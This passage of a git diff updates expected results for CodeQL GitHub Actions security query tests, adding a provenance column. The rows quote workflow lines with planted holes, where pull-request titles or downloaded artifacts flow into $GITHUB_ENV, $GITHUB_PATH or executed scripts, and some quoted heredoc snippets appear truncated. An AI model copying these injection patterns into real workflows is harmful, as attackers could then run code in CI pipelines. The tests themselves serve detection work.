inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | 
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9faa..c76034f74d46 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd05..8589d82d8259 100644 
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | 
jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc239..7fab238795c6 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e32..ea360bc56df0 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e5504..0dbff9553183 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4d..5641ea53afd2 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc117..fdb5beb09aa0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | 
.github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66cc..a18aa5bdc80e 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| 
